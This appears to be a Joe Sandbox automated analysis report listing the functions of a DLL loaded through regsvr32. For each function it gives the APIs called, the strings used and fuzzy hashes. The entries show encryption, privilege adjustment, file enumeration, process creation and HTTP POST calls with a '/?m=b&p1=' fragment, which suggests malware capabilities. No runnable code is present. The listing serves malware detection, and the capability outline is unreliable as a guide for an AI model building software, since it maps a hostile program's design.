CryptReleaseContext.ADVAPI32 ref: 00007FF983D08CE2

Strings

@, xrefs: 00007FF983D08B01
u, xrefs: 00007FF983D08A1B
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00007FF983D08B09

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Crypt$Context$DestroyHash$AcquireEncryptRelease$CreateDataDeriveImportRandom_fread_nolock
String ID: @$Microsoft Enhanced Cryptographic Provider v1.0$u
API String ID: 2427540687-1418344745
Opcode ID: 8239d89c582656e901eb59f2422fdffc84f31b6fe4100522fcdefd294c0c24aa
Instruction ID: 25deaecf2fb902c3a03dd3982f5a1ab6eab76f760759e2899d852bfc0abc90ba
Opcode Fuzzy Hash: 8239d89c582656e901eb59f2422fdffc84f31b6fe4100522fcdefd294c0c24aa
Instruction Fuzzy Hash: 66914973A08B4196E710DFA5E454BAA77B0FBC4784F844039EA8E97A58DF7CE549CB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D09710, Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 350fileUNIQUE

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF983D098B1
ReadFile.KERNEL32 ref: 00007FF983D09981
ReadFile.KERNEL32 ref: 00007FF983D0999C
ReadFile.KERNEL32 ref: 00007FF983D09A09
WriteFile.KERNEL32 ref: 00007FF983D09A9E
CloseHandle.KERNEL32 ref: 00007FF983D09ADE
CloseHandle.KERNEL32 ref: 00007FF983D09B15
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09C20
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09C26
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09C2C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09C32
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D09C4F

Strings

1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735, xrefs: 00007FF983D097BB

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: File_invalid_parameter_noinfo_noreturn$Read$CloseHandle$Write
String ID: 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735
API String ID: 4279757298-3815716874
Opcode ID: 60f8b95a32a266658893655dd053d12ff4ec0199a105a43e3aee86fb73e21a76
Instruction ID: 386bfd910aa94cd0f21cd209a96ad6da87d640d3fe235304b483705514ad78ff
Opcode Fuzzy Hash: 60f8b95a32a266658893655dd053d12ff4ec0199a105a43e3aee86fb73e21a76
Instruction Fuzzy Hash: DFE1F5B2B0464185EB00DBA5E454BAE7761FB45B98F844139DE5EA7B99DFBCE048C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D029A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103UNIQUE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF983D029C6
OpenProcessToken.ADVAPI32 ref: 00007FF983D029D7
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF983D02A32
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF983D02B0B
GetLastError.KERNEL32 ref: 00007FF983D02B15
GetLastError.KERNEL32 ref: 00007FF983D02B29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D02B52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D02B58

Strings

61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9, xrefs: 00007FF983D029FC

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLastProcessToken_invalid_parameter_noinfo_noreturn$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: 61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9
API String ID: 3248160585-2762331935
Opcode ID: e431ee596d85681b439562a55f96945cc149affcda7174252c12624260dc4824
Instruction ID: 56913174f36e586776b48dab6ed8e0d1877c69b0a5c3e71c7466a5aa5e82fd8a
Opcode Fuzzy Hash: e431ee596d85681b439562a55f96945cc149affcda7174252c12624260dc4824
Instruction Fuzzy Hash: 9141A7B2619B81D1EA10CFA5F45476D6361FB84B94F944139D69ED3AA8DFBCF048C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D26BB0, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 381fileUNIQUE

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF983D26C18
FindClose.KERNEL32 ref: 00007FF983D270D5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D2716A

Part of subcall function 00007FF983D031E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D03263

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27176
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27182
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D27188

Strings

>> , xrefs: 00007FF983D26BB6
\, xrefs: 00007FF983D26C70

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find$CloseFileFirst
String ID: >> $\
API String ID: 422238183-1673512177
Opcode ID: c30822f5294bcdc3cdc020209d6c5a067227237ba144b49aa82bb0e7a68e00da
Instruction ID: bd03d35b36b13c98cc0d7b0d59555ae0b95fa2f2ffc71cfd4822bd689bf5ead8
Opcode Fuzzy Hash: c30822f5294bcdc3cdc020209d6c5a067227237ba144b49aa82bb0e7a68e00da
Instruction Fuzzy Hash: 8B02D2B2A08B8085EB00CBA5E4407AE77B1FB85B94F544239DB9D57799DFBCE498C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D41110, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 329timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF983D4114B

Part of subcall function 00007FF983D469EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D46A00

_get_daylight.LIBCMT ref: 00007FF983D4113A

Part of subcall function 00007FF983D46A4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983D46A60

_get_daylight.LIBCMT ref: 00007FF983D4133B
_get_daylight.LIBCMT ref: 00007FF983D4134C
_get_daylight.LIBCMT ref: 00007FF983D4135D
GetTimeZoneInformation.KERNEL32 ref: 00007FF983D41384

Strings

?, xrefs: 00007FF983D41456

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
String ID: ?
API String ID: 435049134-1684325040
Opcode ID: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
Instruction ID: 1ee65c7a077f2bc29e9f7a1d4b29681a076a84eac80a2acc2b421213f1901127
Opcode Fuzzy Hash: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
Instruction Fuzzy Hash: CCD103A2A086428AE710CFA1D441BB96B90FB44784FCC6539EA4FD7695DFBCF449C700

Uniqueness

Uniqueness Score: 16.53%

Function 00007FF983D266E0, Relevance: 9.3, APIs: 6, Instructions: 293fileUNIQUE

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF983D267AA
FindNextFileW.KERNEL32 ref: 00007FF983D267C8
WideCharToMultiByte.KERNEL32 ref: 00007FF983D26B0F

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFind$ByteCharFirstMultiNextWide
String ID:
API String ID: 2913819974-0
Opcode ID: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
Instruction ID: d5e36ed7b8de7ed46cc92ee094b25edbe81092ec218eb0839c1335e1b5d8830d
Opcode Fuzzy Hash: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
Instruction Fuzzy Hash: C2D17CA26196C185DB21DF65C441BFAB3B0FB44B45FC8912ADA4A93684EFB8F249C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D152C0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 250UNIQUE

Download Yara Rule

Strings

5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b, xrefs: 00007FF983D15318

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b
API String ID: 0-66563769
Opcode ID: 51aab8e757506023fc51d8f8d8e0af77544195e9cd9dcf229d38a5185dfe797c
Instruction ID: e081479b340fe81da052ad985e4805718617c68b90af407f5049d897f25a0ce5
Opcode Fuzzy Hash: 51aab8e757506023fc51d8f8d8e0af77544195e9cd9dcf229d38a5185dfe797c
Instruction Fuzzy Hash: 52A1B6A29156C385EB11EFB1C895BFD2351FF04388F889439EA1E9758ADEB8F159C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D14C00, Relevance: 37.2, APIs: 14, Strings: 7, Instructions: 411UNIQUE

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32 ref: 00007FF983D150DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D15264
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D1526A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D15270
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D15276
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D1527C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D15282
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D15288
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D1528E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D15294
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D1529A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D152A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D152A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D152AC

Strings

flag, xrefs: 00007FF983D15129
213c047b04d010be7d6d5daba9287cdb0f472e25, xrefs: 00007FF983D15D25
/?m=b&p1=, xrefs: 00007FF983D15EE7
2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4, xrefs: 00007FF983D14C50, 00007FF983D14F33
&p2=b, xrefs: 00007FF983D15F12
076bf1dc1c002df98f90329224a226012927b807, xrefs: 00007FF983D15B4B
c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60, xrefs: 00007FF983D15999

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateDirectory
String ID: &p2=b$/?m=b&p1=$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4$c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60$flag
API String ID: 3745306311-2943265622
Opcode ID: bfabe6aaf8cd3fd248ded44c889aec705cac2d46292e130a296a38d6f9056c1c
Instruction ID: b71c82213026ba6d9113f664f1bdb997ea8507c6e19f80babb5f6842096b32c0
Opcode Fuzzy Hash: bfabe6aaf8cd3fd248ded44c889aec705cac2d46292e130a296a38d6f9056c1c
Instruction Fuzzy Hash: 1602C8A3B1478186EF00DBA5D4447AD6361FB447A8F845239EA6E57AD9DFBCF188C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D04930, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 388fileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF983D04A13
CloseHandle.KERNEL32 ref: 00007FF983D04A1C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F59
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F5F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F65
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F6B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F71
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F83
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04F9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D04FA1

Strings

9972d150b78185e350433cf98f8fbb1dbb, xrefs: 00007FF983D04A39
384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19, xrefs: 00007FF983D04AA9
a0dd4dc1ce5277f8a538af9b58b895e980724cad41, xrefs: 00007FF983D04A71

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandleWrite
String ID: 384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$9972d150b78185e350433cf98f8fbb1dbb$a0dd4dc1ce5277f8a538af9b58b895e980724cad41
API String ID: 971768948-3814959899
Opcode ID: 898fc7d3c6a6cd492f15d919f69af9d03099e0da089d16fe76fe1245fcb2529c
Instruction ID: 22da7de35cf061477806d72bbe2d3f4a28dd7d6a1bce955a62eaca44eae50bf2
Opcode Fuzzy Hash: 898fc7d3c6a6cd492f15d919f69af9d03099e0da089d16fe76fe1245fcb2529c
Instruction Fuzzy Hash: 1802AAA2B1478195EF00DBB5D454BAC2321FB447A8F845235DA6D97BEADFB8F085C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D01936, Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 316processfileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF983D01CFD
CloseHandle.KERNEL32 ref: 00007FF983D01D06
CreateProcessW.KERNEL32 ref: 00007FF983D01D97
CloseHandle.KERNEL32 ref: 00007FF983D01DA5
CloseHandle.KERNEL32 ref: 00007FF983D01DAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01E5D

Strings

78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee, xrefs: 00007FF983D01AF0
h, xrefs: 00007FF983D01D49

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$CreateFileProcessWrite
String ID: 78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee$h
API String ID: 2469797495-2933482531
Opcode ID: cb384104c03186841014a999532d7d36123cc612bb2e239c6da20cd1d00b46aa
Instruction ID: 30a66ff817474f07e623d9f371590ad5ba9e0f4408a643e4921b4a418efa1975
Opcode Fuzzy Hash: cb384104c03186841014a999532d7d36123cc612bb2e239c6da20cd1d00b46aa
Instruction Fuzzy Hash: 44D1A2A2B1478185EB00CFB9D4547AD2361FB457A8F845739EA6E97BD9DFB8E084C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D17560, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 223networkUNIQUE

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF983D17645
InternetConnectW.WININET ref: 00007FF983D17723
HttpOpenRequestW.WININET ref: 00007FF983D1777D
HttpSendRequestW.WININET ref: 00007FF983D177BE
GetLastError.KERNEL32 ref: 00007FF983D177D5
InternetCloseHandle.WININET ref: 00007FF983D177DE
InternetCloseHandle.WININET ref: 00007FF983D177E7
InternetCloseHandle.WININET ref: 00007FF983D177F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D17933
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D17939

Strings

8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06, xrefs: 00007FF983D1760A
HTTP/1.1, xrefs: 00007FF983D17773
POST, xrefs: 00007FF983D175C8

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest_invalid_parameter_noinfo_noreturn$ConnectErrorLastSend
String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
API String ID: 2032937867-3540460043
Opcode ID: ad9b05d3d878f76f211cd19acc44eb979f2447a48f9a7b1ece1c6c838b3820e5
Instruction ID: f6ce88c8df8c38bcd39fb59eaefa8a42c1a3e88bc2d1812f8b5b9e015645c394
Opcode Fuzzy Hash: ad9b05d3d878f76f211cd19acc44eb979f2447a48f9a7b1ece1c6c838b3820e5
Instruction Fuzzy Hash: 86A1C7B2A1878181EA10DF95E488B6EB361FB84794F844139DA5E97BA5DFBCF448C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D07340, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D076EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D076F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D076FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D07701
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D07707
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0770D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D07713
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D07719

Strings

a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd, xrefs: 00007FF983D07619
a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983D07543
980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983D0746D
8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba, xrefs: 00007FF983D07397

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: 8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f
API String ID: 3668304517-3861941003
Opcode ID: 0c9a84e2e3f632888bdd0b38296c30266ea54525b7cee448175e72687611b5ed
Instruction ID: dd044f3e2140998132ae7bea45da2fcdfeb7dc4e029f4aaab8ea46741afa481f
Opcode Fuzzy Hash: 0c9a84e2e3f632888bdd0b38296c30266ea54525b7cee448175e72687611b5ed
Instruction Fuzzy Hash: BEA182A2F1465194EF00DBB9D854BAC2231BB45BA8F845239DE6DA7BD9DFB8F045C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D25100, Relevance: 21.2, APIs: 14, Instructions: 176UNIQUE

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF983D25134
GetFileInformationByHandle.KERNEL32 ref: 00007FF983D25150

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$HandleInformationType
String ID:
API String ID: 4064226416-0
Opcode ID: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
Instruction ID: c943f960c48cf721987a8ad62e3578949d37c114a416bae962b4915188c33b60
Opcode Fuzzy Hash: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
Instruction Fuzzy Hash: ED718162F08A4296FB64CBB6D454FAD23A1BB44788F844139DE0EA7A58DF78F44DC740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D197D0, Relevance: 19.7, APIs: 13, Instructions: 190networkUNIQUE

Download Yara Rule

APIs

InternetConnectW.WININET ref: 00007FF983D199C1
InternetCloseHandle.WININET ref: 00007FF983D199D2
GetLastError.KERNEL32 ref: 00007FF983D199D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D19AA5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D19AAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D19AB1

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
